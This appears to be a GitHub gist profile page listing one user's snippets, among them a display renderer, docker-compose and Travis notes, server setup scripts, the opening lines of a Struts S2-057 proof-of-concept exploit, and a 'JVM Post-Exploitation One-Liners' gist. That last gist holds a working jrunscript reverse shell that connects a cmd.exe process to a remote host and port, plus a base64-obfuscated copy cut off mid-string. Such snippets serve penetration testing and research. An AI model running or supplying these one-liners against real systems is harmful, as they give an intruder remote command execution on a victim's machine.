Skip to content

Instantly share code, notes, and snippets.

Chris Frohoff frohoff

  • San Diego, CA
View GitHub Profile
@frohoff
frohoff / 14seg.py
Created Dec 17, 2018
14 segment display ascii renderer
View 14seg.py
#!/usr/bin/python
# $ echo bcefgG il | python 14seg.py
#
# | | |
# -- --
# | | |
import string
import sys
@frohoff
frohoff / s2-057.py
Created Aug 23, 2018
Struts S2-057 PoC exploit
View s2-057.py
# some ideas from https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg
import sys
import urllib
import urllib2
if len(sys.argv) != 3:
print 'Usage: %s [url] [command]' % sys.argv[0]
exit(1)
@frohoff
frohoff / README.md
Last active Apr 30, 2018 — forked from TrueFurby/README.md
UserScript: Github Links to Star Badges
@frohoff
frohoff / docker-compose-commands.txt
Created Sep 8, 2017
docker-compose command usage/options
View docker-compose-commands.txt
$ docker-compose 2>&1 | grep -E ' [a-z]+ ' | awk '{print $1}' | xargs -n1 -I{} docker-compose {} -h 2>&1 | grep -E '^\s*(Usage:|-+[a-z])'
Usage: build [options] [--build-arg key=val...] [SERVICE...]
--force-rm Always remove intermediate containers.
--no-cache Do not use cache when building the image.
--pull Always attempt to pull a newer version of the image.
--build-arg key=val Set build-time variables for one service.
Usage: bundle [options]
--push-images Automatically push images for any services
-o, --output PATH Path to write the bundle file to.
Usage: config [options]
@frohoff
frohoff / versions.yml
Last active Sep 8, 2017
travis-ci osx image jdk versions
View versions.yml
# https://github.com/frohoff/travistest
# https://github.com/travis-ci/docs-travis-ci-com/issues/593
# https://docs.travis-ci.com/user/reference/osx/#OS-X-Version
osx_image: xcode9 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8.3 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8.2 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8.1 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8 # oraclejdk8 1.8.0_92-b14
osx_image: xcode7.3 # oraclejdk8 1.8.0_74-b02
osx_image: xcode7.2 # oraclejdk8 1.8.0_66-b17
@frohoff
frohoff / Code.gs
Created Jun 17, 2017
google sheets directions/distance functions
View Code.gs
function qs( obj ) {
return '?'+Object.keys(obj).reduce(function(a,k){a.push(k+'='+encodeURIComponent(obj[k]));return a},[]).join('&')
}
function fetch_directions(o,d) {
Logger.log("fetching: " + JSON.stringify([o,d]));
var userProps = UserProperties.getProperties();
View ubuntu-docker-compose-up.sh
#!/bin/bash -xe
DEBIAN_FRONTEND=noninteractive apt-get update && apt-get upgrade -y && apt-get -y install git python python-pip
curl -s https://get.docker.com | sh
service docker start
pip install -U docker-compose
mkdir /opt/docker.d
View aws-docker-compose-up.sh
#!/bin/bash -xe
yum update -y
yum install -y git
curl -s https://get.docker.com | sh
service docker start
chkconfig docker on
pip install -U docker-compose
View COMMANDMENTS.md
  • Thou shalt place time/space/resource constraints on all otherwise open-ended operations
    • eg: timeouts, result counts, input sizes
  • Thou shalt strive to measure any quantitive values that can vary over time or across samples
    • eg: response times/counts, error counts,
  • Thou shalt not accept, store, transmit, or display a numerical value without its respective units or context
    • eg: timezones, metric/binary prefixes
@frohoff
frohoff / JVM_POST_EXPLOIT.md
Last active Mar 4, 2019
JVM Post-Exploitation One-Liners
View JVM_POST_EXPLOIT.md

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
You can’t perform that action at this time.